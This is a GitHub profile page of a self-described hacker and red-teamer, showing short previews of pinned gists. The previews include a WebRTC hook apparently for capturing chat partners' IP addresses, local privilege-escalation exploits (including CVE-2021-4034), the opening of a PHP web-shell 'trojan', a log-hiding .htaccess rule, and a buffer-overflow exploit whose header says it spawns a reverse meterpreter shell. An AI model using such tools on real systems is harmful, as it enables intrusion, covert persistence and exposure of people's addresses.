Skip to content
View isrvb's full-sized avatar
Block or Report

Block or report isrvb

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
isrvb/README.md

👤 About Me:

Hi!.. im that hacker guy that your friends told you about. Hacking and vlog about the bountylife. Hackfluencer - Creative - Redteam - Programer - Student.

💰 You can help me by Donating

PayPal

🌐 Socials:

LinkedIn Medium Twitter image portfolio

📊 GitHub Stats:



🔝 Top Contributed Repo

Pinned

  1. script-omegle.js script-omegle.js
    1
    window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection
    2
    window.RTCPeerConnection = function(…args) {
    3
    const pc = new window.oRTCPeerConnection(…args)
    4
    pc.oaddIceCandidate = pc.addIceCandidate
    5
    pc.addIceCandidate = function(iceCandidate, …rest) {
  2. Linux Kernel - local privilege escal... Linux Kernel - local privilege escalation
    1
    /*
    2
     * #Linux Kernel Exploit
    3
     * Hi Hacker, Happy hacking VB
    4
     *
    5
     *
  3. blasty-vs-pkexec.c blasty-vs-pkexec.c
    1
    /*
    2
     * blasty-vs-pkexec.c
    3
     * ------------------------------------------------
    4
     * PoC for CVE-2021-4034, shout out to Qualys
    5
     *
  4. Simple trojan in PHP.error_reporting... Simple trojan in PHP.error_reporting(0);
    1
    <?php
    2
    error_reporting(0); 
    3
    $action = $_GET['cmd'];
    4
    $pw = $_GET['pw']; 
    5
    $password = "7a3b4197c700b7a94efef0a0590f465664ff210e120156a8c70913c1302fc06fa1bc85cffbf2fb113f99323f08e91489dd4531a0c3657b22fdc065f87b799f5b";
  5. http-htaccess.php http-htaccess.php
    1
    SetEnvIf Request_URI "^/tmpdir/tempfile\.php$" dontlog
    2
    <Limit GET POST HEAD>
    3
    order deny,allow
    4
    deny from all
    5
    allow from 127.0.0.1 (or the remote ip of the server).
  6. Chat Server - Remote Stack Buffer Ov... Chat Server - Remote Stack Buffer Overflow
    1
    # Exploit Title: Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
    2
    # Usage: python remCS.py <victim-ip> <port>
    3
    # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
    4
    # CVE: CVE-2004-2466 
    5
    # Installer: http://www.echatserver.com/